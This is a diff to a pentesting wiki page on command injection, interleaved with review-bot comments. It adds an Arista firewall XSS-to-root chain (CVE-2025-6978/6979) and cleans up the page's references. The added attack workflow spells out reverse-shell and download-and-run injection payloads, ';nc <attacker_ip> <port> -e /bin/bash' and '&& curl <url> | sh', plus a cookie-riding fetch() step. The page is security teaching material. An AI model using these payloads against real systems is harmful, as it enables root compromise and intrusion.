13 changes: 12 additions & 1 deletion src/pentesting-web/command-injection.md
@@ -158,6 +158,17 @@ execFile('/usr/bin/do-something', [

Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024).

### JSON-RPC admin helpers shelling out (`/bin/sh -c`)

Bishop Fox documented how Arista’s NGFW exposes JSON-RPC endpoints to the management UI where a Java handler builds a `/bin/sh -c` string with attacker-controlled arguments (CVE-2025-6978). Any JSON-RPC request issued with a valid administrator session cookie reaches that handler and commands execute as **root** because the Tomcat/Apache stack runs with full privileges.

#### Attack workflow
1. **Find the captive portal surface.** `curl -skI https://<target>/capture/handler.py/load_rpc_manager` returning `500 Internal Server Error` shows the captive-portal Python handlers are still callable, which is a prerequisite for both the JSON-RPC helper exposure and the reflected XSS primitive (CVE-2025-6979).
2. **Trigger the XSS to run attacker JS in an admin context.** The malicious URL can show an innocuous login screen while it background-loads JavaScript that immediately `fetch()`es the JSON-RPC endpoint with the victim’s cookies, as described in the report.
3. **Replay/modify a legitimate JSON-RPC call.** Use a proxy or browser DevTools to capture an innocuous RPC body from the dashboard, then replace the user-controlled field that the Java helper concatenates (diagnostic commands often expose parameters such as line counts, filenames, or interface names). Appending `;nc <attacker_ip> <port> -e /bin/bash` or `&& curl <url> | sh` inside that field spawns a reverse shell.
4. **Receive root RCE.** Because the Java helper executes `/bin/sh -c <string>` the injected metacharacters break out of the intended command and run the attacker payload as root. The Bishop Fox write-up also shows this still works on software 17.4 because the patch did not cover every call site, so a single click on the weaponized XSS URL can deliver a reverse shell from the firewall.


### Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.
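Review bot: the new subsection never states which software versions are affected or fixed, even though step 4 claims the patch in 17.4 missed call sites; add the affected/fixed range from the Bishop Fox advisory next to CVE-2025-6978 in the intro paragraph, and introduce CVE-2025-6979 (the reflected XSS) there as well rather than first mentioning it inside step 1, since the intro currently reads as a post-auth, admin-only issue and the XSS is what turns it into a one-click chain. The section also ends without the defensive counterpart the rest of the page gives (compare the `execFile('/usr/bin/do-something', [` context just above the hunk): one closing sentence that the fix is passing arguments as a separate argv array (for a Java handler, `ProcessBuilder` with one argument per element instead of a concatenated `/bin/sh -c` string) and not running the management stack as root would keep the new text consistent with the page's other sections. Minor: the two consecutive blank lines after step 4 should be a single one, matching the spacing before the other `###` headings.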
@@ -199,12 +210,12 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject

## References

- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
- [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
- [Bishop Fox – Arista NextGen Firewall: Chaining Stored XSS to Root Remote Code Execution](https://bishopfox.com/blog/arista-nextgen-firewall-xss-to-rce-chain)

{{#include ../banners/hacktricks-training.md}}
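Review bot: removing the duplicated PayloadsAllTheThings entry is correct, but the Bishop Fox blog post is now the only source backing the new JSON-RPC subsection and its version claims; add the vendor advisory (or the NVD entries) for CVE-2025-6978 and CVE-2025-6979 beside it so readers can verify the affected and fixed versions independently of the write-up.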